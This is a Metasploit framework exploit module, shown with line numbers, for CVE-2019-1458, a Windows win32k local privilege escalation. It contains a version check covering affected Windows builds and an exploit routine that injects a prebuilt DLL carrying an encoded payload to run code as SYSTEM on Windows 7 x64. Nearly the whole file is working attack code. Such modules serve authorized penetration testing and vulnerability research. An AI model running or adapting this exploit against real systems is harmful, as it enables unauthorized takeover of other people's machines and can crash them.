Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = NormalRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Post::Windows::Priv
12
  include Msf::Post::Windows::FileInfo
13
  include Msf::Post::Windows::Process
14
  include Msf::Post::Windows::ReflectiveDLLInjection
15
  prepend Msf::Exploit::Remote::AutoCheck
16

17
  def initialize(info = {})
18
    super(
19
      update_info(
20
        info,
21
        'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',
22
        'Description' => %q{
23
          This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability
24
          within win32k which occurs due to an uninitalized variable, which allows user mode attackers
25
          to write a limited amount of controlled data to an attacker controlled address
26
          in kernel memory. By utilizing this vulnerability to execute controlled writes
27
          to kernel memory, an attacker can gain arbitrary code execution
28
          as the SYSTEM user.
29

30
          This module has been tested against Windows 7 x64 SP1. Offsets within the
31
          exploit code may need to be adjusted to work with other versions of Windows.
32
          The exploit can only be triggered once against the target and can cause the
33
          target machine to reboot when the session is terminated.
34
        },
35
        'License' => MSF_LICENSE,
36
        'Author' => [
37
          'piotrflorczyk', # poc
38
          'unamer', # exploit
39
          'timwr', # msf module
40
        ],
41
        'Platform' => 'win',
42
        'SessionTypes' => ['meterpreter'],
43
        'Targets' => [
44
          ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
45
        ],
46
        'Notes' => {
47
          'Stability' => [ CRASH_OS_RESTARTS ],
48
          'Reliability' => [ UNRELIABLE_SESSION ],
49
          'SideEffects' => [ IOC_IN_LOGS ]
50
        },
51
        'References' => [
52
          ['CVE', '2019-1458'],
53
          ['URL', 'https://github.com/unamer/CVE-2019-1458'],
54
          ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],
55
          ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],
56
          ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']
57
        ],
58
        'DisclosureDate' => '2019-12-10',
59
        'DefaultTarget' => 0,
60
        'AKA' => [ 'WizardOpium' ]
61
      )
62
    )
63
  end
64

65
  def check
66
    if session.platform != 'windows'
67
      # Non-Windows systems are definitely not affected.
68
      return CheckCode::Safe
69
    end
70

71
    file_path = expand_path('%WINDIR%\\system32\\win32k.sys')
72
    major, minor, build, revision, branch = file_version(file_path)
73
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
74

75
    build_num_gemversion = Rex::Version.new("#{major}.#{minor}.#{build}.#{revision}")
76

77
    # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/
78
    if (build_num_gemversion >= Rex::Version.new('6.0.6000.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008
79
      return CheckCode::Appears
80
    elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2
81
      return CheckCode::Appears
82
    elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012
83
      return CheckCode::Appears
84
    elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2
85
      return CheckCode::Appears
86
    elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.18427')) # Windows 10 v1507
87
      return CheckCode::Appears
88
    elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.99999')) # Windows 10 v1511
89
      return CheckCode::Appears
90
    elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.3383')) # Windows 10 v1607
91
      return CheckCode::Appears
92
    else
93
      return CheckCode::Safe
94
    end
95
  end
96

97
  def exploit
98
    if is_system?
99
      fail_with(Failure::None, 'Session is already elevated')
100
    end
101

102
    if sysinfo['Architecture'] != ARCH_X64
103
      fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')
104
    end
105

106
    # invoke the exploit, passing in the address of the payload that
107
    # we want invoked on successful exploitation.
108
    print_status('Triggering the exploit...')
109
    encoded_payload = payload.encoded
110
    execute_dll(
111
      ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll'),
112
      [encoded_payload.length].pack('I<') + encoded_payload
113
    )
114

115
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
116
  end
117
end
118

119